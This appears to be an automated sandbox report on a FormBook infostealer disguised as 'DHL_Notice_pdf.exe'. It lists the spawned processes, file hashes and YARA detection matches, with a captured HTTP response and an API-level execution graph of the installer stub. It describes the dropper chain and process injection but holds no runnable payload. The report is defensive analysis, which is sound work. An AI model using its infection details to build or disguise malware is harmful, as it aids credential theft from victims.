                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 not found</title> <link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><main class='container'> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle
                                                          Mar 21, 2023 08:08:19.611103058 CET476INData Raw: 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c
                                                          Data Ascii: '>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</span> <span class='particle'>4</
                                                          Mar 21, 2023 08:08:19.611145020 CET477INData Raw: 72 74 69 63 6c 65 27 3e 30 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 30 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 30 3c 2f 73 70 61
                                                          Data Ascii: rticle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particle'>0</span> <span class='particl


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:08:06:55
                                                          Start date:21/03/2023
                                                          Path:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          Imagebase:0x400000
                                                          File size:255238 bytes
                                                          MD5 hash:771508CF2751F6DABE05758E4FA25FDF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          General

                                                          Target ID:1
                                                          Start time:08:06:55
                                                          Start date:21/03/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t
                                                          Imagebase:0x400000
                                                          File size:5632 bytes
                                                          MD5 hash:BE5A6985BCDCA9064A05D26CFB8D082E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 27%, ReversingLabs
                                                          Reputation:low

                                                          General

                                                          Target ID:2
                                                          Start time:08:06:55
                                                          Start date:21/03/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:3
                                                          Start time:08:06:56
                                                          Start date:21/03/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
                                                          Imagebase:0x400000
                                                          File size:5632 bytes
                                                          MD5 hash:BE5A6985BCDCA9064A05D26CFB8D082E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          Reputation:low

                                                          General

                                                          Target ID:4
                                                          Start time:08:07:00
                                                          Start date:21/03/2023
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff69fe90000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:5
                                                          Start time:08:07:10
                                                          Start date:21/03/2023
                                                          Path:C:\Windows\SysWOW64\cmmon32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                          Imagebase:0xd0000
                                                          File size:36864 bytes
                                                          MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          Reputation:high

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:15.9%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:16.4%
                                                            Total number of Nodes:1385
                                                            Total number of Limit Nodes:25
                                                            execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 